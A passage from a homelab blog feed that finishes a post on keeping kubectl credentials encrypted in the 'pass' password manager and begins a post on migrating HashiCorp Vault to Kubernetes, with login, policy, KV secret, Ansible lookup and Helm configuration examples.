required, otherwise you&rsquo;re going to get pieces of X11 installed on an Ubuntu
system.</p>
<p>To initialize pass, the <code>init</code> command is used, with the public key&rsquo;s keyhash
used as input:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>pass init 3BBC8F8D9E7CB515338C6F0B34BBBD3D676F000F
</span></span></code></pre></div><p>This creates the password store in the default location at <code>~/.password-store</code>.</p>
<h2 id="setup-kubernetes">Setup Kubernetes</h2>
<p>Following Sheogorath&rsquo;s <a href="https://shivering-isles.com/2022/03/store-kubernetes-credentials-pass">blog post</a>,
I first extracted the keys from the Kube config file with these commands:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>kubectl config view --minify --raw --output <span style="color:#e6db74">&#39;jsonpath={..user.client-certificate-data}&#39;</span> | base64 -d | sed -e <span style="color:#e6db74">&#39;s/$/\\n/g&#39;</span> | tr -d <span style="color:#e6db74">&#39;\n&#39;</span> &gt; client-cert
</span></span><span style="display:flex;"><span>kubectl config view --minify --raw --output <span style="color:#e6db74">&#39;jsonpath={..user.client-key-data}&#39;</span> | base64 -d | sed -e <span style="color:#e6db74">&#39;s/$/\\n/g&#39;</span> | tr -d <span style="color:#e6db74">&#39;\n&#39;</span> &gt; client-key
</span></span></code></pre></div><p>Then I added the values to an <a href="https://kubernetes.io/docs/reference/config-api/client-authentication.v1beta1/#client-authentication-k8s-io-v1beta1-ExecCredential">ExecCredential</a>
I stored in pass by running this command first:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>pass edit k8s/credentials
</span></span></code></pre></div><p>This will open the editor configured in the <code>EDITOR</code> environment variable. Then I pasted
this into it:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-json" data-lang="json"><span style="display:flex;"><span>{
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">&#34;apiVersion&#34;</span>: <span style="color:#e6db74">&#34;client.authentication.k8s.io/v1&#34;</span>,
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">&#34;kind&#34;</span>: <span style="color:#e6db74">&#34;ExecCredential&#34;</span>,
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">&#34;status&#34;</span>: {
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;clientCertificateData&#34;</span>: <span style="color:#e6db74">&#34;-----BEGIN CERTIFICATE-----\n...\n-----END CERTIFICATE-----&#34;</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;clientKeyData&#34;</span>: <span style="color:#e6db74">&#34;-----BEGIN RSA PRIVATE KEY-----\n...\n-----END RSA PRIVATE KEY-----&#34;</span>
</span></span><span style="display:flex;"><span>  }
</span></span><span style="display:flex;"><span>}
</span></span></code></pre></div><p>I replaced the <code>clientCertificateData</code> with the content of the <code>client-cert</code>
file extracted with the previous command and the <code>clientKeyData</code> with the
content of the <code>client-key</code> file. Finally, the entire file content should be
squashed into a single line of text, and then the editor can be closed.</p>
<p>If everything worked as expected, pass has now stored that file content at
<code>~/.password-store/k8s/credentials</code>, encrypted with the public key given in the
<code>pass init</code> command. Try it out by running this command:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>pass show k8s/credentials
</span></span></code></pre></div><p>If you haven&rsquo;t run any commands which require decryption up to now, a popup should
appear from your pinentry program asking you to unlock your GnuPG private key.
This will even appear when you&rsquo;ve previously unlocked that same private key
for local use on your desktop machine, as GnuPG treats the local and remote
machine as two different instances, for security reasons.</p>
<p>The final step is to adapt the <code>~/.kube/config</code> file to use the credentials from
pass. For that, I opened the file and edited it to look like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">v1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">clusters</span>:
</span></span><span style="display:flex;"><span>- <span style="color:#f92672">cluster</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">certificate-authority-data</span>: <span style="color:#ae81ff">&lt;Cluster CA CERT&gt;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">server</span>: <span style="color:#ae81ff">https://k8s.example.com:6443</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">my-kube-cluster</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">contexts</span>:
</span></span><span style="display:flex;"><span>- <span style="color:#f92672">context</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">cluster</span>: <span style="color:#ae81ff">my-kube-cluster</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">user</span>: <span style="color:#ae81ff">my-kube-user</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">my-kube-user@my-kube-cluster</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">current-context</span>: <span style="color:#ae81ff">my-kube-user@my-kube-cluster</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">Config</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">preferences</span>: {}
</span></span><span style="display:flex;"><span><span style="color:#f92672">users</span>:
</span></span><span style="display:flex;"><span>- <span style="color:#f92672">name</span>: <span style="color:#ae81ff">my-kube-user</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">user</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">exec</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">client.authentication.k8s.io/v1</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">command</span>: <span style="color:#ae81ff">pass</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">args</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">show</span>
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">k8s/credentials</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">interactiveMode</span>: <span style="color:#ae81ff">IfAvailable</span>
</span></span></code></pre></div><p>The only change necessary is in the <code>users</code> array, where the <code>user:</code> entry for
your user should be changed to contain the <code>exec</code> section shown, instead of the
<code>client-certificate-data</code> and <code>client-key-data</code> entries.</p>
<p>And with that, kubectl will execute the command <code>pass show k8s/credentials</code>
to access the credentials. And this doesn&rsquo;t just work for kubectl, but I&rsquo;ve also
tested it with the <a href="https://docs.ansible.com/ansible/latest/collections/kubernetes/core/docsite/kubernetes_scenarios/k8s_intro.html">Ansible k8s modules</a>.</p>
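<p>The test for the whole setup is as unspectacular as it should be: any kubectl
command will do, and if the GnuPG key isn&rsquo;t already unlocked, the pinentry prompt
pops up before the request goes out:</p>
<pre tabindex="0"><code>kubectl get nodes
</code></pre>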
]]></content:encoded>
    </item>
    <item>
      <title>Nomad to k8s, Part 24: Migrating Vault to Kubernetes</title>
      <link>https://blog.mei-home.net/posts/k8s-migration-24-vault/</link>
      <pubDate>Mon, 07 Apr 2025 20:41:41 +0200</pubDate>
      <guid>https://blog.mei-home.net/posts/k8s-migration-24-vault/</guid>
      <description>Migrating my baremetal Vault to the Kubernetes cluster.</description>
      <content:encoded><![CDATA[<p>Wherein I migrate my HashiCorp Vault instance to the Kubernetes cluster.</p>
<p>This is part 24 of my <a href="https://blog.mei-home.net/tags/k8s-migration/">k8s migration series</a>.</p>
<p>Look at all this Yak wool. That&rsquo;s how much it takes to migrate <a href="https://www.vaultproject.io/">Vault</a> from
baremetal to a Kubernetes deployment. I&rsquo;ve been going back and forth for quite
a while, trying to decide what to do with my Vault instance. It&rsquo;s the one piece
of HashiCorp software I do not currently plan to get rid of. But there was a
problem: My Vault, or rather the High Availability nature of it, relied on
HashiCorp&rsquo;s <a href="https://www.consul.io/">Consul</a> and its DNS service discovery
functionality. And while I did want to keep Vault, I did not want to keep
Consul. And I also didn&rsquo;t really want to introduce some other load balancing
mechanism in front of Vault, like <a href="https://www.haproxy.org/">HAProxy</a>.</p>
<p>In the end, I sat down and thought quite hard for quite a while, mostly
thinking about potential reasons for why I should not move Vault to the Kubernetes
cluster. My main worry is bootstrapping - what happens if my entire Homelab goes
down, unplanned, and all at once? Be it because I stumble over the absolutely
wrong cable, or because my oven develops a short again and throws the main fuse.
Could I still get my Homelab back up and do any massaging it might need?</p>
<p>I ended up deciding that Vault on Kubernetes should be fine. All Kubernetes
Secrets are synced into the cluster anyway, and any other secrets I might need
also live in my password manager. It should be fine. Watch this space for the
day I find out what I overlooked. &#x1f605;</p>
<p>And thus began the Yak shaving.</p>
<h2 id="vault">Vault</h2>
<p>But before we climb that mountain of wool, let&rsquo;s take a short detour and
look at what Vault is and what I use it for. Boiled down to the simplest terms,
HashiCorp&rsquo;s Vault is an API server for secrets of many, many different kinds.
It supports everything from simple key-value secrets to PKI certificates.
It can also serve short-lived tokens, including for HashiCorp&rsquo;s other products
like Consul or Nomad. I used it for a number of things over the years.</p>
<p>For me, the most important part of it is the <a href="https://developer.hashicorp.com/vault/docs/secrets/kv">KV store</a>.
It stores all manner of passwords, keys and certificates, like my public
cert. And it makes all of those available, given proper authorization, over HTTP.
I use secrets from this store for my Ansible playbooks, the Mastodon secrets via
<a href="https://external-secrets.io/latest/">external-secrets</a> in my Kubernetes cluster
and in my image generation setup for new hosts as well.
Support for it is very widespread as well - in HashiCorp&rsquo;s own tools of course,
but also in third-party tools like Ansible, where you shouldn&rsquo;t confuse it with
Ansible&rsquo;s own Vault secret store.</p>
<p>In the past, I also used the <a href="https://developer.hashicorp.com/vault/docs/secrets/nomad">Nomad secrets engine</a>
to get a short-lived token for Nomad API access for my backup solution.</p>
<p>Another big use case for me is as an internal, self-signed CA. During my Nomad/Vault/Consul
cluster days, this was pretty important functionality, because those self-signed
certs were used by all three components of my Homelab to secure their HTTPS
communication. I&rsquo;ve even gone to the length of installing the CA on all of my
devices, so I don&rsquo;t get any untrusted certificate warnings when accessing
services secured with that CA.
Since the introduction of Kubernetes, I&rsquo;m not using the Homelab CA quite as
much, but there are still a few internal things secured with it.</p>
<p>For a short while, I even considered using Vault as my OIDC identity provider,
but in the end I decided against it. My main reason was that I would have needed
to hang my internal secret store into the public internet, because I intended to
use OIDC for some public sites. Even though I&rsquo;ve got no reason to distrust
HashiCorp&rsquo;s security practices, and I could have made only certain paths publicly
accessible, that exposure just wasn&rsquo;t worth it to me.</p>
<p>So what does working with Vault actually look like? The main interface is the
Vault CLI executable. You can control anything you need from the command line.
But it also provides a WebUI, if that&rsquo;s more your cup of tea. I never bothered
with it.</p>
<p>The first step of working with Vault is to obtain a token for all further tasks.
For this, Vault offers <a href="https://developer.hashicorp.com/vault/docs/auth">a plethora</a>
of auth methods, ranging from the good old username/password to OIDC or TLS certs.
I&rsquo;m using the <a href="https://developer.hashicorp.com/vault/docs/auth/userpass">userpass</a>
method. It&rsquo;s comfortable for me: I can use my password manager and just
copy+paste the password in. It looks something like this:</p>
<pre tabindex="0"><code class="language-shel" data-lang="shel">vault login -method=userpass username=myuser
Password (will be hidden):
Success! You are now authenticated. The token information displayed below
is already stored in the token helper. You do NOT need to run &#34;vault login&#34;
again. Future Vault requests will automatically use this token.

Key                    Value
---                    -----
token                  hvs.CAESII0RlV4BS_5_A2q8mIpzYxiye0XoE-_Vvlb0YIAYfl-6Gh4KHGh2cy5sSmpvZk5QMXN2QW0wZ0c0R1A3cXV3TkQ
token_accessor         5ofJhWq55yZGOk6CJVRyBacd
token_duration         4h
token_renewable        true
token_policies         [&#34;admin&#34; &#34;default&#34;]
identity_policies      []
policies               [&#34;admin&#34; &#34;default&#34;]
token_meta_username    myuser
</code></pre><p>Don&rsquo;t worry, this token has long since expired. &#x1f642;
When you use <code>vault login</code>, Vault automatically puts the received token into the
file <code>~/.vault-token</code>. The <code>vault</code> CLI, as well as other tools with Vault
integration, will check that path automatically.</p>
<p>As you&rsquo;d expect from a properly secured application, the tokens you&rsquo;re getting
have a restricted TTL. How long a token is initially valid can be configured,
in addition to enabling token renewal and defining an upper bound on how long
a token can live under any circumstances.</p>
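<p>If you want to check how much time is left on the token you&rsquo;re currently using,
or extend it, the token commands have you covered:</p>
<pre tabindex="0"><code>vault token lookup   # shows the TTL, policies and accessor of the current token
vault token renew    # extends the TTL, within the configured maximum
</code></pre>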
<p>Then there&rsquo;s also the policies. Those define what the holder of a token can
actually do with it. In this case, I have the <code>default</code> and <code>admin</code> policies.
The <code>default</code> policy mostly allows the holder to access information about the
token they&rsquo;re using, while <code>admin</code> is my admin policy, allowing full access to
Vault. It looks something like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-hcl" data-lang="hcl"><span style="display:flex;"><span><span style="color:#66d9ef">path</span> <span style="color:#e6db74">&#34;sys/health&#34;</span>
</span></span><span style="display:flex;"><span>{
</span></span><span style="display:flex;"><span>  capabilities <span style="color:#f92672">=</span> [<span style="color:#e6db74">&#34;read&#34;, &#34;sudo&#34;</span>]
</span></span><span style="display:flex;"><span>}<span style="color:#75715e">
</span></span></span><span style="display:flex;"><span><span style="color:#75715e">
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"># Create and manage ACL policies broadly across Vault
</span></span></span><span style="display:flex;"><span><span style="color:#75715e">
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"># List existing policies
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span><span style="color:#66d9ef">path</span> <span style="color:#e6db74">&#34;sys/policies/acl&#34;</span>
</span></span><span style="display:flex;"><span>{
</span></span><span style="display:flex;"><span>  capabilities <span style="color:#f92672">=</span> [<span style="color:#e6db74">&#34;list&#34;</span>]
</span></span><span style="display:flex;"><span>}<span style="color:#75715e">
</span></span></span><span style="display:flex;"><span><span style="color:#75715e">
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"># Create and manage ACL policies
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span><span style="color:#66d9ef">path</span> <span style="color:#e6db74">&#34;sys/policies/acl/*&#34;</span>
</span></span><span style="display:flex;"><span>{
</span></span><span style="display:flex;"><span>  capabilities <span style="color:#f92672">=</span> [<span style="color:#e6db74">&#34;create&#34;, &#34;read&#34;, &#34;update&#34;, &#34;delete&#34;, &#34;list&#34;, &#34;sudo&#34;</span>]
</span></span><span style="display:flex;"><span>}<span style="color:#75715e">
</span></span></span><span style="display:flex;"><span><span style="color:#75715e">
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"># Enable and manage authentication methods broadly across Vault
</span></span></span><span style="display:flex;"><span><span style="color:#75715e">
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"># Manage auth methods broadly across Vault
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span><span style="color:#66d9ef">path</span> <span style="color:#e6db74">&#34;auth/*&#34;</span>
</span></span><span style="display:flex;"><span>{
</span></span><span style="display:flex;"><span>  capabilities <span style="color:#f92672">=</span> [<span style="color:#e6db74">&#34;create&#34;, &#34;read&#34;, &#34;update&#34;, &#34;delete&#34;, &#34;list&#34;, &#34;sudo&#34;</span>]
</span></span><span style="display:flex;"><span>}<span style="color:#75715e">
</span></span></span><span style="display:flex;"><span><span style="color:#75715e">
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"># Create, update, and delete auth methods
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span><span style="color:#66d9ef">path</span> <span style="color:#e6db74">&#34;sys/auth/*&#34;</span>
</span></span><span style="display:flex;"><span>{
</span></span><span style="display:flex;"><span>  capabilities <span style="color:#f92672">=</span> [<span style="color:#e6db74">&#34;create&#34;, &#34;update&#34;, &#34;delete&#34;, &#34;sudo&#34;</span>]
</span></span><span style="display:flex;"><span>}<span style="color:#75715e">
</span></span></span><span style="display:flex;"><span><span style="color:#75715e">
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"># List auth methods
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span><span style="color:#66d9ef">path</span> <span style="color:#e6db74">&#34;sys/auth&#34;</span>
</span></span><span style="display:flex;"><span>{
</span></span><span style="display:flex;"><span>  capabilities <span style="color:#f92672">=</span> [<span style="color:#e6db74">&#34;read&#34;</span>]
</span></span><span style="display:flex;"><span>}<span style="color:#75715e">
</span></span></span><span style="display:flex;"><span><span style="color:#75715e">
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"># Enable and manage the key/value secrets engine at `secret/` path
</span></span></span><span style="display:flex;"><span><span style="color:#75715e">
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"># List, create, update, and delete key/value secrets
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span><span style="color:#66d9ef">path</span> <span style="color:#e6db74">&#34;secret/*&#34;</span>
</span></span><span style="display:flex;"><span>{
</span></span><span style="display:flex;"><span>  capabilities <span style="color:#f92672">=</span> [<span style="color:#e6db74">&#34;create&#34;, &#34;read&#34;, &#34;update&#34;, &#34;delete&#34;, &#34;list&#34;, &#34;sudo&#34;</span>]
</span></span><span style="display:flex;"><span>}<span style="color:#75715e">
</span></span></span><span style="display:flex;"><span><span style="color:#75715e">
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"># Manage secrets engines
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span><span style="color:#66d9ef">path</span> <span style="color:#e6db74">&#34;sys/mounts/*&#34;</span>
</span></span><span style="display:flex;"><span>{
</span></span><span style="display:flex;"><span>  capabilities <span style="color:#f92672">=</span> [<span style="color:#e6db74">&#34;create&#34;, &#34;read&#34;, &#34;update&#34;, &#34;delete&#34;, &#34;list&#34;, &#34;sudo&#34;</span>]
</span></span><span style="display:flex;"><span>}<span style="color:#75715e">
</span></span></span><span style="display:flex;"><span><span style="color:#75715e">
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"># Manage secrets engines
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span><span style="color:#66d9ef">path</span> <span style="color:#e6db74">&#34;sys/remount&#34;</span>
</span></span><span style="display:flex;"><span>{
</span></span><span style="display:flex;"><span>  capabilities <span style="color:#f92672">=</span> [<span style="color:#e6db74">&#34;create&#34;, &#34;read&#34;, &#34;update&#34;, &#34;delete&#34;, &#34;list&#34;, &#34;sudo&#34;</span>]
</span></span><span style="display:flex;"><span>}<span style="color:#75715e">
</span></span></span><span style="display:flex;"><span><span style="color:#75715e">
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"># List existing secrets engines.
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span><span style="color:#66d9ef">path</span> <span style="color:#e6db74">&#34;sys/mounts&#34;</span>
</span></span><span style="display:flex;"><span>{
</span></span><span style="display:flex;"><span>  capabilities <span style="color:#f92672">=</span> [<span style="color:#e6db74">&#34;read&#34;</span>]
</span></span><span style="display:flex;"><span>}<span style="color:#75715e">
</span></span></span><span style="display:flex;"><span><span style="color:#75715e">
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"># Homenet Root CA access
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span><span style="color:#66d9ef">path</span> <span style="color:#e6db74">&#34;homenet-ca*&#34;</span> {
</span></span><span style="display:flex;"><span>  capabilities <span style="color:#f92672">=</span> [ <span style="color:#e6db74">&#34;create&#34;, &#34;read&#34;, &#34;update&#34;, &#34;delete&#34;, &#34;list&#34;, &#34;sudo&#34;</span> ]
</span></span><span style="display:flex;"><span>}
</span></span></code></pre></div><p>Armed with this token, I can then for example take a look at my secrets:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>vault read secret/s3_users/blog
</span></span><span style="display:flex;"><span>Key                 Value
</span></span><span style="display:flex;"><span>---                 -----
</span></span><span style="display:flex;"><span>refresh_interval    768h
</span></span><span style="display:flex;"><span>access              abcde
</span></span><span style="display:flex;"><span>custom_metadata     map<span style="color:#f92672">[</span>managed-by:external-secrets<span style="color:#f92672">]</span>
</span></span><span style="display:flex;"><span>secret              <span style="color:#ae81ff">12345</span>
</span></span></code></pre></div><p>This is a pretty nice example, in fact. It shows that the <code>blog</code> secret consists
of two entries, <code>access</code> and <code>secret</code>, containing the standard S3 credentials.
But it also has <code>custom_metadata</code> indicating that it wasn&rsquo;t actually created
by me by hand, but was pushed into Vault via an external-secrets <a href="https://external-secrets.io/latest/api/pushsecret/">PushSecret</a>.
I&rsquo;m doing this because I need the S3 credentials for my blog both in an Ansible
playbook I use to configure S3 buckets and in the K8s cluster, because that&rsquo;s
where Rook Ceph creates the bucket and the credentials.</p>
<p>To put that same secret into Vault, the following command line could be used:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>vault kv put secret/s3_users/blog access<span style="color:#f92672">=</span>abcde secret<span style="color:#f92672">=</span><span style="color:#ae81ff">12345</span>
</span></span></code></pre></div><p>This would of course have the downside of putting the secret into the shell
history, unless a space is added at the front.
If you&rsquo;d prefer having Vault take the secret from stdin, you can run the same
command like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>vault kv put secret/s3_users/blog access<span style="color:#f92672">=</span>abcde secret<span style="color:#f92672">=</span>-
</span></span></code></pre></div><p>This will take the <code>access</code> key from the parameter, but for the <code>secret</code>, it
will read the value from stdin, which keeps it out of the shell history.
But this approach also has a downside: only one key can use <code>-</code> as its input.
If you have more than one actually secret parameter, you can instead put all of
them into a JSON file. I will demonstrate that later on when I migrate my Vault content
from my baremetal instance to the Kubernetes deployment.</p>
<p>If you want to use Vault values from within Ansible, I&rsquo;ve found the <a href="https://docs.ansible.com/ansible/latest/collections/community/hashi_vault/hashi_vault_lookup.html">Vault lookup</a>
pretty nice to use. It can be used like this, to set a variable in a playbook:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span>- <span style="color:#f92672">hosts</span>: <span style="color:#ae81ff">all</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">Demonstration</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#ae81ff">demo</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">vars</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">s3_access</span>: <span style="color:#e6db74">&#34;{{ lookup(&#39;hashi_vault&#39;, &#39;secret=secret/s3_users/blog:access token=&#39;+vault_token+&#39; url=&#39;+vault_url) }}&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">s3_secret</span>: <span style="color:#e6db74">&#34;{{ lookup(&#39;hashi_vault&#39;, &#39;secret=secret/s3_users/blog:secret token=&#39;+vault_token+&#39; url=&#39;+vault_url) }}&#34;</span>
</span></span></code></pre></div><p>I&rsquo;m setting the <code>vault_token</code> with Ansible&rsquo;s <a href="https://docs.ansible.com/ansible/latest/collections/ansible/builtin/file_lookup.html">file lookup</a> like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">vault_token</span>: <span style="color:#e6db74">&#34;{{ lookup(&#39;file&#39;, &#39;/home/my_user/.vault-token&#39;) }}&#34;</span>
</span></span></code></pre></div><p>And because that file is automatically updated when the <code>vault login</code> command is
used, I&rsquo;m getting the current token automatically.</p>
<p>I will go into a bit more detail about generating certificates later as part
of the Vault k8s setup.</p>
<h2 id="setting-up-the-helm-chart">Setting up the Helm chart</h2>
<p>Alright. Let the Yak shaving finally commence. First of all, it&rsquo;s notable that there is
no official way to migrate the content of one Vault instance to another. So I
had to go with setting up a completely new instance of Vault on k8s, instead of
doing some sort of in-place migration.</p>
<p>So the first step was to configure and deploy the <a href="https://github.com/hashicorp/vault-helm">official Helm chart</a>,
following <a href="https://developer.hashicorp.com/vault/tutorials/kubernetes/kubernetes-raft-deployment-guide">this guide</a>.</p>
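<p>The deployment itself is the usual Helm dance, roughly like this - the chart repo
is the one HashiCorp documents, while namespace and values file name are of course
my own choices:</p>
<pre tabindex="0"><code>helm repo add hashicorp https://helm.releases.hashicorp.com
helm repo update
helm install vault hashicorp/vault --namespace vault --create-namespace -f values.yaml
</code></pre>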
<p>And here is the result:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">global</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">tlsDisable</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">openshift</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">serverTelemetry</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">prometheusOperator</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">injector</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">server</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">logLevel</span>: <span style="color:#ae81ff">debug</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">logFormat</span>: <span style="color:#ae81ff">json</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">resources</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">requests</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">memory</span>: <span style="color:#ae81ff">500Mi</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">cpu</span>: <span style="color:#ae81ff">500m</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">limits</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">memory</span>: <span style="color:#ae81ff">500Mi</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">ingress</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">readinessProbe</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">path</span>: <span style="color:#e6db74">&#34;/v1/sys/health?standbyok=true&amp;sealedcode=204&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">livenessProbe</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">path</span>: <span style="color:#e6db74">&#34;/v1/sys/health?standbyok=true&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">initialDelaySeconds</span>: <span style="color:#ae81ff">600</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">tolerations</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">effect</span>: <span style="color:#ae81ff">NoSchedule</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">key</span>: <span style="color:#ae81ff">node-role.kubernetes.io/control-plane</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">operator</span>: <span style="color:#ae81ff">Exists</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">nodeSelector</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">homelab/role</span>: <span style="color:#e6db74">&#34;controller&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">networkPolicy</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">priorityClassName</span>: <span style="color:#e6db74">&#34;system-cluster-critical&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">extraLabels</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">homelab/app</span>: <span style="color:#ae81ff">vault</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">homelab/part-of</span>: <span style="color:#ae81ff">vault</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">service</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">true</span>
